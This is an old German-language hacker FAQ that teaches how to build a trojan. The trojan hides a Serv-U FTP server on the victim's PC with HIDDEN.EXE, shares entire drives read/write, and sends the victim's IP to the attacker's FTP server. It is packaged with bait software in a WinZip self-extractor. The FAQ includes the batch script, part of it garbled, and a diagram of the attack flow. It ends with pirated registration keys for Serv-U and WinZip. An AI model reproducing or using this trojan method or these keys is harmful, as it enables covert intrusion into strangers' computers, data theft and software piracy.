FTP HACKING FAQ BY XPACCSX XpaCcsX@h-d-c.org
1.) Was ist FTP
2.) Erstellen des Servers
3.) Heimlicher Festplattenzugriff über das Intenet
4.) Der Trojaner
5.) Ergänzungen
_____________________________________________________________________________
1.) Was ist Ftp
Ftp steht für File Transfer Protokoll. Mit diesem protokoll ist es
möglich weltweit Server anzusprechen, und von denen die Freigegebenden
Daten zu Lesen,Schreiben oder Löschen. Mann kann in einem FTP server über
dem Standartbrowser, oder über ein spezielles FTP Client Programm z.B.
Cute Ftp einsteigen Die 2te Möglichkeit ist in jeden falle besser, weil
man dort alle Vorteile des Ftp Protokolls nutzen kann (z.B.
Lesen,Schreiben,Editieren, Löschen, Erstellen von Datein und
Verzeichnissen). Die meisten FTP Server werden von Universitäten, oder
Firmen wie z.B. Microsoft (ftp://ftp.Microsoft.com) Geführt.
2.) Erstellen des Servers
Nun ist es aber auch möglich, einen Normalen HomePc, Oder wie die Webung
immer sagt "Multimedia PC" für Solche aufgaben zu deklarieren. Die
vorteile eines solchen "Kleinen" Servers ist, das alle Daten (die
Freigegebenden) weltweit abrufbar sind. Eines dieser Programme, um einen
Solchen PC zum Server zu Deklarieren ist z.B. das Windows Programm
Serv-u. mit diesem programm ist es weitgehen möglich, Daten freizugeben,
und Benutzerlisten mit Namen und Kennwort zu sichern und diesen
Dateizugriff jeweils ihren Privilegien zu geben. mann sollte dabei darauf
achten, das die anzahl der Besucher im System nicht die Bandbreite des
Modem's oder ISDN anschlusses übersteigt, da sonst unangenehme
Wartezeiten von Clienten aus entstehen.
3.) Heimlicher Festplattenzugriff über das Internet
nun hab ich dir Grundlage erläutert, und komm mal zu dem Thema Hacking.
genau so gut wie ein fachgebiet auch ist, kann man es auch für Negative
Zwecke missbrauchen. Es Handelt sich dabei um ein verfahren, was ich
selber entwickelt habe. Befor mann sich auf die Daten anderer freut, muss
einiges beachtet werden. im ersten sinne ist ja der Heimische PC von der
aussenwelt relativ stark getrennt, das heisst, das im eigendlichen sinne
keine direkten Plattenzugriffe erfolgen können. Ab diesen moment kann und
das Serv-U Programm weiterhelfen, wobei angemerkt werden kann, das auch
andere server programme genau so tauglich sein können verwendet werden.
wenn mann serv-U richtig (oder eben auch falsch) konfiguriert, kann man
damit auch gesammte Laufwerke freigeben, also eben auch mit Lese
Schreibeberechitung. soweit ein server auf dem system in dieser
konfiguration gestartet wird, ist die Heimische Festplatte quasi offen im
Netz ansprechbar, kann also weltweit zugegriffen werden. Leider bestehen
dabei 2 Probleme, die es zu lösen gilt, einen solchen server fremd
Arbeiten zu lassen. als erstes muss sichergestellt werden, das der
Anwender, auf dem der server Installiert wird nicht davon mitbekommt. Das
2te Problem ist die einfache sache, das man die richtige IP nummer nich
kennt (ausser natürlisch im IRC). Für das erste Problem hab ich im
demsinne abhilfe geschaffen, das ich ein Programm gefunden habe, welsches
das Serv-U nicht sichtbar startet, quasi es erscheint nicht, arbeitet
dennoch im Hintergrund. dieses Programm ist auf vielen PC- Welt CD's oder
im internet erhältlich, und nennt sich schlicht HIDDEN.EXE Startet mann
also "Hidden.EXE serv-u32.exe" ist der Server auf dem "Feindrechner"
aktiv, kann jedoch nicht wahrgenommen werden. Als 2tes muss die IP Nummer
des gegenbers ermittelt werden. Dieses weitere Problem habe ich mit
dem Windows programm FTP.EXE gelöst, das auf jedem Windows 95 PC mitbei
ist. Der quellcode ( oder die Batches ) habe ich angehängt. dieser FTP
Client versucht nun beim start auf den Server des gegners zu gelangen,
wobei die IP des "Feindrechners" Offengelegt wird. (dafür muss der
angreifer einen eigenden FTP server installiert haben). wonach dann der
Server versteckt geladen wird. wenn die IP nun bekannt ist, kann der
angreifer über FTP:// auf dem "Feindrechner" so richtig
flanieren, was das modem mitmacht, wobei zu sagen währe, das man doch ein
wenig aufplassen sollte, den gerade bei modem's ist es standard, das der
sendecanal als ständiges blinklicht auffält. hat der "FeindPC" jedoch
ISDN, wobei es sich heutzutage meisst um eine ISDN Karte handelt kann man
in aller ruhe (un schnelligkeit) ganze programme mühelos übertragen.
4.) Der Trojaner
Da sich dieses Programm ja nicht von selbst in anderen Rechnern kopiert
muss man einen kleinen Trojaner basteln. Da ich selber offengesagt
garnicht programmieren kann, habe ich mir wege und möglichkeiten
ausgedacht, diese problem zu lösen. das erstes musste ich eine Batches
schreiben, der dioe entsprechenden Aktionen ausführt. als 2ten schritt
muss nun ein "Köder gefunden werden, welsches für den "Feind" interissant
ausieht. mann muss also dafür sorgen, das die Batsches folgendes tut :
- die IP Nummer übertragen
- den server Starten ( unnbemerkt)
- das eigendliche köderprogramm zu installieren
(die Batches werde ich im unteren teiel mit erläuterungen einfügen). da
eine reine Batches als startoption zu öffentlich aussieht, müsste mann
dieses "Packet" also:
- Batch
- Serv-u
- Hidden
- Köderprogramm
packen. ich habe mich im meinem fall auf Winzip konzentriert, weil der
Winzip Selextraktor wirkich gute dienste leistet, wenn man kleinere
installationsroutinen ausführen will. dieses gesammte packet muss dann
nur noch verschickt werden. wenn es bei dem gegenüber gestartet worden
ist, erhält man kurz darauf die IP nummer, da sich der Trojaner in
"meinem" Server einloggen will. ab diesem Moment kann man sich dann auf
die Festplatte stürzen besondern augenmerk würde ich allererst darauf, ob
C:\Decoder, oder c:\highwav existieren (das sind die
Standartverzeichnisse wenn man einen ISDN (ISt Das Nötig) besitzt.
Der Troajner läuft also so ab :
Eigender PC --- Schickt Trojaner -------> FremdPC
I I
Eigender PC -<--Erhält IP nummer-----<------I I--- Startet
I Serv-U
Eigender PC -->- Greift ber die IP zu ---->---I
I
Eigender PC --->------->-Hat Vollen zugriff----I
_____________________________________________________________________________
--- Die Batches ---
@echo off
:: --------------------- Kopiert die Trojanischen Datein nach
:: c:\windows
COPY HIDDEN.exe %windir%
copy install.exe %windir%
copy serv-u.ini %windir%
::---------------------- Startet den Server im Hintergrund
%windir%\hidden.exe %windir%\install.exe } ---- Gepackt
in Windzip Self Extraktor !
::---------------------- Sendet die IP
echo quit> bEcho Weiter mit beliebiger Taste . . .
instal2 <"b">"nul
del b
::---------------------- Ende
_____________________________________________________________________________
5.) Ergänzungen
Ich hoffe, das ich noch jemanden finde, und mir dieses programm in eineVB
version abändert. geplant sind nich Routinen für den start von programmen
auf dem Fremdrechner . Leider sind meine programmierKenntnisse nicht sehr
ausgeprägt, als hätte ich mehr eingebaut. wenn noch jemand fragen hat,
kann er diese Richten an XpaCcsX@H-d-C.org ps: dies ist meine erste Faq
(und auch mein hmmmm 5ter Hack), wobei ich noch nichma in club's drinne
bin oder so :-))
RegistrierungsCodes :
Serv-U : Registrationkey=r8fZajeU3JY,ED!SON '96
Winzip SelfExtraktor : name/Bad Crc #/215360
Winzip : name: Murad Meraly #/34077594
Die nötigen filez, wie oben beschrieben hänge ich als UUDecode ansi an
diese datei an.
www.h-d-c.org
XpaCcsX 98